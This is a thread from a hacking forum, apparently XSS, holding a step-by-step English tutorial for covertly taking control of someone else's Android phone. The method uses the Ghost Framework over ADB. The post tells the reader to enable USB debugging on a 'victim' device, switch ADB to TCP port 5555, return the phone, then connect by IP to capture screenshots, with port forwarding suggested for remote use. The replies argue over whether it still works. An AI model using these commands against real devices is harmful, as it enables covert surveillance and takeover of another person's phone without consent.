• XSS.stack #1 – первый литературный журнал от юзеров форума

Hack Android Devices Using IP Address.

Ex Coder

ripper
КИДАЛА
Регистрация
13.08.2021
Сообщения
43
Реакции
11
Гарант сделки
1
Пожалуйста, обратите внимание, что пользователь заблокирован
Ghost Framework - Control Android Devices Remotely

Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration.

We can use this framework to control old Android devices which have turn on the debug bridge in the "Developer options".

Now this becomes very harmful because an attacker gets the full admin control on the vulnerable Android device.

In our this detailed tutorial we will practically learn how we can use the Ghost Framework to take control of Android device from our Kali Linux system.


So we start from Installing Requirements

Note: - We are doing this attack local Network Device Should be Same Network

Step 1: - Open a terminal and then Install the ADB using the following command

Код:
 sudo apt-get update

sudo apt-get install android-tools-adb

sudo apt-get install android-tools-fastboot


Step 2 : - Clone the Ghost Framework from GitHub by using the following command:

Код:
 git clone https://github.com/entynetproject/ghost

The screenshot of the command is following:

clone.jpg


Step 3: - Then we go the ghost directory by using cd command:

Код:
 cd ghost

Step 4: - Now we need to install it using the installer script. Before that we give the permission to the installer script by applying following command:

Код:
 sudo chmod + x install.sh

Step 5: - Now we can run the installer script using the following command:

Код:
 sudo ./install.sh

Then wit will start installing the dependencies and as the following screenshot:

fd.png


This process will take some time depending on your internet speed.

Now Everything is installed Lets Start exploiting

Step 1 : - Go to about phone and then tap 7 times on Build Number as

usb-debbugin-1.png



Step 2 : - Now back to the setting and now you can see, there will be an Option of development setting. click on that and then Enable USB Debugging as


usb-debbugin-3.png




Now connect the Android device via USB cable and allow the USB Debbuging when prompt. To verify the connection is successful or not, execute the following command

Код:
 adb devices

adb%2Bdevice.png


Step 3: - Again type the following command to enable tcpip in that Android Device

Код:
 adb tcpip 5555

tcpip.png


Now You Can Remove USB cable give back to victim Mobile

Step 4: - Now we can run Ghost Framework from any where in our terminal by only the ghost command:

Код:
 ghost

And the ghost will appear with its main menu as the following screenshot or type help to get all commands:

ghost.png


Step 5: - Now type the following command to connect with victim mobile

Код:
 connect 192.168.43.212

here connect is a command and IP address of victim mobile now you can see payload connected

payload.png



Stpe 6: - we will take a screenshot of victim Mobile using following command: -

Код:
 screenshot / root

ss.png


Screenshot is command and / root is Directory where you would like the screenshot to be saved. in my case, I am going to save in / root folder.

Note: There are lots of exploits here you can do with that Android device.

If you want to use PhoneSploit Over WAN just use Port Forwarding

Alright guys. thanks and enjoy your day.
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Does Ghost framework still work against current android firmware?
yes, still works. some who say does not, didn't even try it.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Immediately I say the tool does not work.
It was working perfectly for Android 4 and below,but still it's not a practical option
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх